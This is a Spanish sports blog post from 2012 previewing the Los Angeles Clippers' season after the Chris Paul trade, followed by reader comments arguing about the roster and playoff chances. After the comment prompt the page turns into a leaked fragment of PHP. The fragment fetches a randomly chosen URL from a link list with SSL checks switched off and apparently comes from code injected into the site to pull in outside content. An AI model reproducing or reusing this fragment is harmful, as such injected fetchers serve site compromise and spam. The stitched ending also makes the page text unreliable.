Los Angeles Clippers: Se acabaron las excusas

18 de January de 2012 por Hynreck

Tal vez David Stern haya hecho más por los Clippers que Elgin Baylor, Mike Dunleavy, Carl Scheer o cualquier otro General Manager que haya estado al frente de la franquicia. En el anterior lockout, allá por el año 98, Baylor elegía a Michael Olowokandi con la primera elección del draft. Esta temporada, Stern vetaba el traspaso de Chris Paul a los Lakers, propiciando su posterior llegada al hermano pobre de Los Angeles. Por una vez reían en la ciudad unos aficionados que no estaban acostumbrados a ello.

Además de a Paul, tambien conseguían, desoyendo los deseos del jugador, al amnistiado Chauncey Billups, reuniendo la mejor pareja de bases de la liga. Finalmente, en la agencia libre se hacían con un trotamundos como Caron Butler que completa una plantilla muy profunda, y pese a que por el camino han perdido piezas importantes como Chis Kaman, Eric Gordon y Al-Farouq Aminu, nadie duda de que el salto de calidad que han de dar esta temporada ha de hacerles competir de tú a tú con los mejores.

Chris Paul, uno de los mejores bases (para muchos el mejor) de la última década llevará el timón del equipo. Toda la liga suspiraba por hacerse con sus servicios. No tenemos que descubrirle: capaz de llevar el ritmo de los partidos, repartir juego, aportando en todos los rubros, excelente ladrón y defensor, ofensivamente un portento… ¿Y qué si le falta algo de tiro exterior?

A su lado el mencionado Chauncey Billups partirá como falso SG pero no se sentirá extraño. Pese a su edad es más que capaz  de aportar anotaciones interesantes noche tras noche. Su experiencia y saber estar le serán muy útiles al equipo. En el banquillo esperarán Mo Williams y Eric Bledsoe. Bledsoe se las prometía muy felices antes de la llegada de Billups y de Paul. Producto de la Kentucky de Calipari (ya saben, el “One and done”), gracias a su buen final de temporada se veía llevando el rumbo de la franquicia en los próximos años. La verdad que tenerle de cuarto PG es un auténtico lujo. ¿Se queda ahí la cosa? Ni mucho menos, un recuperado Randy Foye aportará más anotación desde el banquillo, y el rookie Travis Leslie defensa cuando sea necesario.

Caron Butler, jugador infravalorado muchas veces, llega con un anillo en su mano, y con ganas de recuperar el protagonismo que no tuvo en Dallas. Recuperado de su lesión, se trata de un alero completísimo. Quizás no haya llegado a ser lo que apuntaba en sus inicios en Miami pero es una pieza que puede ser muy importante, tanto ofensiva como defensivamente. Ryan Gomes le dará descanso y no escatimará ganas cada vez que salga.

Decir que Blake Griffin fue el rookie del año es quedarse corto. Definirle como All-Star también, pues lo será muchas veces. Lo mejor sería aventurar que es un futuro Hall of Famer. Un jugador como él no sale cada año. Físico imponente, una bestia bajando rebotes, ágil, atlético, y quizás el interno más rápido de la NBA. Además, no dudamos de que sus recursos irán a más cada año. Pese a tener a Paul, sobre Giffin recaen las esperanzas de la franquicia de conseguir algo importante.

“Ganarás el pan con el sudor de tu frente”. El gran Andrés Montes definía así a los jugadores como Reggie Evans. Un carpanta de los rebotes que cuando se equivoca anota algo pero se equivoca poco, paradójica desgracia. El rookie Trey Thompkins por su parte, intentará arañar algún minutillo.

DeAndre Jordan es otro prodigio físico, un excelente atleta. De los mejores intimidadores de la liga,  tiene tiempo para pulir sus carencias técnicas pues sólo cuenta con 23 años. Los Clippers hicieron un gran esfuerzo igualando la oferta de los Warriors por él este otoño. Quizás, él y Griffin formen una pareja a la que le sobra músculo pero que carezca de fundamentos. Aún así pueden ser dominantes esta misma temporada. Sus recambios sin embargo son lo más flojo de la plantilla. Brian Cook y Solomon Jones, jugadores muy diferentes, podrían darle descanso. Cook en un papel similar al de Matt Bonner en San Antonio y Jones como un currante de la zona. Necesitarían otro interno de garantías para afrontar la competición, Mo Williams o Eric Bledsoe deberían servir como moneda de cambio.

Y así se presentan estos ilusionantes Clippers.  Como decimos en el título, se les han acabado las excusas. Su histórica mala suerte ya no vale, ni las lesiones, ni ser el patito feo de la ciudad. El objetivo de éste proyecto a corto-medio plazo debe ser el anillo. Somos exigentes, sí, pero la contratación de Paul conlleva una dosis de ambición innegable. Paul-Griffin es una base más que sólida para un proyecto ganador. Es el ahora o nunca. Los Clippers pueden cambiar la tendencia en Los Ángeles. No es facil, es verdad, hay equipos como los Thunder o los Heat que aspiran a lo mismo con iguales o superiores mimbres. Pero si dentro de 5 años volvemos la vista atrás y éste equipo no ha sido campeón, se podría considerar un fracaso.

Quinteto: Chris Paul-Chauncey Billups-Caron Butler-Blake Griffin-DeAndre Jordan
Sexto hombre: Randy Foye

Pronóstico: Finalistas de conferencia

Comenta

22 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Chicos, en el tweet sobre esto, habéis puesto un enlace a la última foto, no a la entrada en sí 🙂

      Citar

  2. Txusma dice:
    #2

    Anda que estoy fino! 😀

      Citar

  3. Jose Luis dice:
    #3

    jajajajaja corregido, ahora va perfecto 🙂

      Citar

  4. Sancho88 dice:
    #4

    Bueno, ser campeones o no serlo no creo que sea un fracaso para los Clippers, coincidiendo con los Heat y los Bulls en el este. Ningún equipo del Oeste volverá a tener las finales ‘a huevo’, como ha ocurrido desde la retirada de Michael Jordan. El año pasado ya era favorita la Conferencia Este para el título, y creo que este año también. Para mí, lo que sería un fracaso es que este equipo no se metiera asiduamente en las finales de conferencia. A partir de ahí, todo puede pasar. Para ser realmente aspirantes al título, Griffin tiene que pegar un cambio mental, una evolución en su juego. No es descabellado colocarle como futuro Hall of famer, como bien dices Hynreck, pero es cierto que Kobe debió aprender a jugar en equipo, para llevarse los anillos sin Shaquille, Lebron también ha pegado un cambio muy drástico en su juego colectivo y en sus prestaciones en el tiro (en ese sentido, es un jugador mucho más completo que Griffin), y a Griffin no le pasa como a Kobe o Lebron (y que conste, que la comparación está hecha con respecto a las sensaciones de crack, de jugador total que puede hacer de todo y ganarse un anillo él solo, o casi solo), él ya se llevó el ROY el año pasado siendo un muy buen jugador colectivo. Ahora la tiene que ‘colar’ desde lejos. A veces es bochornoso ver como le flotan y las sigue fallando… Pero es muy esperable que mejore esas prestaciones. El triple no debe ser su objetivo, ya que es un ‘4’ poderoso, muchos lo comparasteis con Barkley en las interminables charlas del año pasado, pero sí debe serlo el tiro a 5-6 metros. Si no es capaz de amenazar a media distancia (y mejorar en tiros libres), su amenaza en el juego ofensivo baja muchos enteros y se hace más fácil para el equipo rival defenderle. Así, confiando en la progresión de este animalito, más el mejor base del mundo (se acepta debate entre él y Rose), que es Chris Paul, y añadiendo la defensa de Jordan, los triples de Billups y el ‘hacetodo’ que es Caron Butler, semis de conferencia este año ineludibles, y a partir de ahí, a soñar. Finalistas de conferencia? muy posiblemente, pero la competición dictará si están en condiciones o no de llegar a ellas, con el banquillo tan reducido que tienen. Yo sigo pensando que no sé a qué están esperando para traspasar a MO-Bledsoe por algún pívot (sería acojonantemente gracioso, aunque acojonantemente irreal, un traspaso por PAU), y a piyarse a Al Thornton. Si resuelven las carencias en la rotación, yo les situaría claramente favoritos para ganar la Conferencia Oeste. Ahora mismo, no, a no ser que demuestren lo contrario. Creo que todos estamos esperando que nos sorprendan positivamente

      Citar

  5. kobe dice:
    #5

    Chris Paul el mejor base de la última década….

      Citar

  6. dsromero dice:
    #6

    yo creo que este equipo aún no está para ser finalista de conferencia este año, no con esta plantilla. Para mi una semifinal de conferencia sería un muy buen resultado para este año.

    habrá que estar atentos a este equipo por que con la base de Paul-Griffin-Jordan pueden montar un equipo aspirante a todo si juegan bien sus cartas

      Citar

  7. melo15 dice:
    #7

    Hombre finalistas, de conferencia deberia ser su objetivo, no hay gente merjor que ellos en el oeste ahora mismo, puede que los Thunder, pero ya no mas, y dudo que Dallas o los Lakers, puedan con ellos, aunque nunca se sabe, mira lo que le paso a Lebron, le eliminaron los Celtics y nadie se lo pensaba

      Citar

  8. HeiNeKeN dice:
    #8

    Yo también creo que tienen que traspasar a Mo Williams o Bledsoe por un interior y luego buscar un alero en el mercado de agentes libres. No se si Thorton es el indicado, ya lo largaron por su pasotismo pero tampoco se si hay mejores opciones disponibles.

      Citar

  9. Esteban dice:
    #9

    Yo me he entusiasmasdo con los clippers a tal punto de mirar todos sus partidos

    Es sencillo paul juega todos los partidos a media maquina salvo los importantes q los gana el solo, alli se ve q no fue un alto precio el pagado y mas se notara en los PO

    El resto esta todo dicho, aunque no coincido con el analisis, foyle, gomes, salomon y cook, no dan la talla, son el peor baquillo de la nba

    Cook tipo bonner? La diferencia es q bonner si mete los triples q tira

    Griffin? Creo q tiene demasiada responsabilidad para ser su segundo año, sino miren donde anda jhon wall

      Citar

  10. jose antonio ramirez dice:
    #10

    Excelente analisis, estoy muy impresionado con el nivel tanto de esta pagina como de los que habitualmente colaboran y dan su opinion. Me parece con diferencia la mejor web de nba en español y la primera que veo siempre para ponerme al dia. He de decir que ya se intuia el año pasado con la explosion de la bestia griffin que la clipermania volvia por sus fueros, me acuerdo de aquellos años de darius miles, quentin richardson y compañia y el detalle de cada canasta de uno y otro que se tocaban la cabeza con las 2 manos con los puños cerrados en señal de la relacion que los unia. De todas maneras aquellos no dejaban de ser un equipo de bad boys que jugaban espectacular y poco mas, aparte del merchandising. Pero lo que este año tienen los clippers, madre mia…. No se han visto en una igual nunca. Juntar a paul-billups-griffin (de rebote) les da para soñar con algo muy gordo. Y pienso que no solo ya este año, lo mejor de esta plantilla es que tienen una base para ser dominadores en la liga y llevarse unos anillos. La mala noticia es que se van a encontrar con miami y les puede pasar como utha y chicago, que se los llevaba michael, en este caso wade/lebron. Yo personalmente no voi a incidir en el analisis porque es estupendo y me parece que ya esta todo dicho, este año si mantienen este bloque la nba no la van a ganar porque les falta profundidad y no les llega, ni pienso que es el año tan pronto, pero metele a esta plantilla un escolta tipo michael redd ( no se porque no lucharon por el) y sobre todo un pivot que dentro tenga un poco de fundamentos y pueda anotar, ya que deandre jordan no me acaba de convencer y esta muy solo griffin,y no hay plantilla en la nba que pueda igualar sus piezas. He de decir que me parece mucho mejor equipo ya que oklahoma, con mas recursos, y para mi deberia ganar la conferencia oeste este año ya. Pedirle el anillo seria pedir peras al olmo, ya que incido en que me parece muy justo solo este año para los ajustes y sabiendo que esta plantilla no se mantendra asi hasta el final. Yo veo una dinastia en este equipo, que posiblemente empezara el año que viene si soluciona los deficits que todos conocemos, porque que los consiga en este febrero seria muy improbable. Para finalizar una aclaracion y comentario que siempre me ha gustado poder decir en un sitio serio de nba. 1- Me parece mejor que oklahoma, por que aunque cuentan con durant, en el computo general pierden, empezando por el juego interior y terminando con el base. 2- Hablando de bases, he de decir que cris paul es un jugadorazo, pero para mi el mejor base de la nba es rajon rondo, el dirigio a los celtics del anillo siendo muy joven, y cada dia que pasa es mejor en mas aspectos. Me parece un base increible. Un saludo a todos.

      Citar

  11. melo15 dice:
    #11

    hombre, no se mejor que los thunder, lo veo muy muy justo, porque los Thunder tienen a Ibaka y a Perkins que es una de las parejas interiores mas defensivas, capaces de secar a Griffin no? y no creo que Butler pueda con Durant, por muy all-around player que sea este, hay que tener en cuenta que Durant es el 3 mejor jugador creandose los tiros despues de Kobe y Melo, y Westbrook, es un animal en defensa y cuando quiere es un base de los mejores, fisico, defensa, anotacion, para mi los Thunder son claramente superiores

      Citar

  12. simon dice:
    #12

    exacto Esteban, lo grande de Paul es que si vieramos sus numeros ante equipos de la parte baja de la clasificacion veriamos que tiene unas estadisticas muy pobres, sobre todo en puntos. sin embargo si estudiaramos sus partidos contra equipos aspirantes vemos como sube enormemente su aportacion en puntos y en asistencias de forma sustancial, y en PO ni te digo…
    Por cierto, decir que Paul es el mejor base de la decada me parece una temeridad, estando un señor que se llama Steve Nash…

      Citar

  13. Jose Luis dice:
    #13

    no sé si llegarán a la final de conferencia jose antonio, pero sí que es cierto que debe ser su mínimo a partir del próximo año prácticamente, aunque OKC casi que la tiene fija también para los próximos años. Yo veo aún superiores a Thunder también, pero bueno, veamos si pueden conseguir un escolta o un interior que merezca la pena moviendo a Mo y Bledsoe, y tendrán un buen equipo para aspirar a casi casi todo.

      Citar

  14. melo15 dice:
    #14

    vosotros creeis que son superiores a OCK???
    Sabeis si los thunder volveren a ser los Sonics, es decir volveran a Seattle

      Citar

  15. Denise dice:
    #15

    Este año el objetivo no debe ser el anillo, sino que jugadores como Griffin, De Andre e incluso Paul cojan experiencia en partidos importantes de Playoffs. Y para el año que viene, si el GM hace las cosas bien pueden montar un equipazo, ademas tienen activos muy apetecibles para traspasar.

    Y no sé muy bien como andarán de margen salarial, pero creo que podrían tener margen para pujar por Dwight Howard si éste permaneciese toda la temporada en Orlando. Y el trío que podrían formar Paul-Griffin-Howard sería brutal. Y después traspasas a De Andre Jordan y por un 3 en condiciones, por ejemplo por Iguodala; y por otros como Mo Williams podrías pillar un par de jugadores altos aceptables para el banquillo.

    En fin, que no le metais mucha presion al equipo que éste no es todavía su año.

      Citar

  16. Sancho88 dice:
    #16

    Jose Antonio, muy respetable tu opinión. Rondo tiene un anillo, pero no podemos olvidar lo que dice Simón. A mí también me parece un poco osado comparar la década de Rondo con la década de Steve Nash. Dos MVP’s, líder de un estilo de juego genuino como el Run&Gun, y en dobles-dobles en puntos y asistencias, promediando más de 16 puntos y 10 asistencias y 3 rebotes desde su época de los Mavs. Además, los porcentajes que tiene Nash en todas las zonas de tiro no las roza Rondo ni en sueños. No sé, es como decir que como Nash jugó en los 90, se le debe considerar mejor base de esa década estando gente como Stockton, Kidd o Hardaway. yo creo que si Rondo confirma su mejoría de tiro, sí que puede marcarse una década prodigiosa, pero siempre estarán Chris Paul y Derrick Rose haciéndole sombra… Creo que siempre va a estar estigmatizado como un base no anotador, y para pasar a la historia con esos mimbres, debería ‘clavarse’ en el triple doble día sí, día también, como Jason Kidd en sus mejores momentos. ¿Es capaz de ello? En mi opinión, sí. Y además, cuando se vayan retirando Allen, Pierce y Garnett, que no les quedarán ni tres años, no le va a quedar más remedio que coger la pelotita y anotar +20 puntos todos los días. De todas maneras, la incertidumbre sobre lo que se espera de él es alta, y todos deseamos que dé ese pasito adelante en cuanto a fiabilidad en el tiro, porque con sus características podría estar en 20 puntos, 10 asistencias y 10 rebotes no tardando. Un jugador a seguir sin duda alguna.

      Citar

  17. Esteban dice:
    #17

    Hay q dejar de hacerse ilusiones con traspasar a Mo, eso no es posible, tiene dos años a casi 9 millones popr cobrar, nadie en su sano juicio lo querra, sobretodo porq no hay equipo tan debiles en la posicion de base como para hacer esa locura, quiza los lakers

    Si lo traspasan deben juntar algo interesante con el, y mas q una primera ronda o bledsone no tienen, y ambos significarian oscurecer el futuro de la franquicia

    Una pena q el trade de paul tardo tanto, para cuando se hizo los clips habian perdido tiempop y tenian un roster bien completo con kaman de relewvo interior y aminu de alero suplente
    Sus idas los dejaron desnudos en la banca, y al hacerse tan tardiamente perdieron la chance de ir por mcgrady, howard, radmanovic, battier o similares, ya q tienen espacio en el tope y esos jugadores podrian habewre sido un salto en la banca

    Yo creo q Mo no puede ser transefrido, por lo q deben hacerse con agentes libres, posey y thorton

    O intercambiar a foyle por morrow q es mas alto y es un jugador de rol necesario en este equipo

      Citar

  18. melo15 dice:
    #18

    Pues que traspasen a Bledsoe, no tiene ningun futura en este equipo

      Citar

  19. simon dice:
    #19

    No creo que ningún equipo dé nada interesante por Bledsoe, al menos algo que pueda servir para PO. Es mas, para mi Bledsoe cocinandose a fuego lento con la muñeca que tiene y a la sombra de Paul.. puede convertirse en unos años en un escandalo de jugador y en un activo importante para la banca.
    Yo creo que los clippers simplemente tiene que ir aprendiendo, por lo menos un par de años mas e ir firmando jugadores con experiencia para la banca y que vayan aportando, ademas dentro de dos años Williams termina contrato, ese año si que serán jugosos sus 9 millones que libera del tope salarial de cara a un traspaso a una franquicia que esté buscando reconstruir su equipo…
    Como diría el gran Andrés Montes visteme despacio que tengo prisa.

      Citar

  20. Esteban dice:
    #20

    simon:
    No creo que ningún equipo dé nada interesante por Bledsoe, al menos algo que pueda servir para PO. Es mas, para mi Bledsoe cocinandose a fuego lento con la muñeca que tiene y a la sombra de Paul.. puede convertirse en unos años en un escandalo de jugador y en un activo importante para la banca.
    Yo creo que los clippers simplemente tiene que ir aprendiendo, por lo menos un par de años mase ir firmando jugadores con experiencia para la banca y que vayan aportando, ademas dentro de dos años Williams termina contrato, ese año si que serán jugosos sus 9 millones que libera del tope salarial de cara a un traspaso a una franquicia que esté buscando reconstruir su equipo…
    Como diría el gran Andrés Montes visteme despacio que tengo prisa.

    no comparto, depende q consideres interesante, por el millon que cobra bledsone, varios quisieran tenerlo, pero creo q a quien mas le conviene tenerlo por ese precio es a los propios clippers q deben afrontar renovaciones de paul y griffin en el futuro y rearmar su banca

    creo q muchos darian jugadores itneresantes por bledsone, pero eso si, mas caros, lo que obligaria a los clippers a gastar espacio q no tienen

    lo mejor es quedarselo y aplicar la anmistia por Mo, si hace uso de su opcion de jugador

    quiza traspasar a Mo por ariza, creo que los hornets tomarian el riesgo con la unica ilusion que Mo renuncie a su opcion de jugador para no jugar en new orleans

      Citar

  21. simon dice:
    #21

    Precisamente por eso no merece la pena traspasar a Bledsoe, por el precio y la juventud del jugador mejor quedarselo, pues no te van a dar nada por el que pueda dar un salto de calidad al equipo, y si te dan algo interesante es un contrato largo que podría comprometer otras operaciones futuras, a eso me referia cuando decia que no les iban a dar nada interesante.

      Citar

  22. GreenPride dice:
    #22

    Pues estos Clips deberían ser candidatos a todo casi desde ya pero como ha quedado dicho aquí yo aún les veo algún hueco que rellenar. Tienen 4 bases, ningún escolta puro y les haría falta algún interior decente sobre todo de cara a los playoffs. Lo de no tener escoltas puros no debería ser tanto problema pudiendo jugar Billups y Mo de 2 pero yo creo que la jugada debería ser traspaso de Mo a cambio de un interior en condiciones de dar descanso a Jordan y Griffin. Si lo consiguen y Griffin consigue progresar un poco más entonces sí les vería candidatos incluso a las finales pero yo creo que a la hora de la verdad darán guerra pero caerán contra Mavs o Thunder. Me encantaría una eliminatoria que les enfrentase a los Lakers por el dominio de la ciudad y el morbo Paul-Lakers, estaría muy bien…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>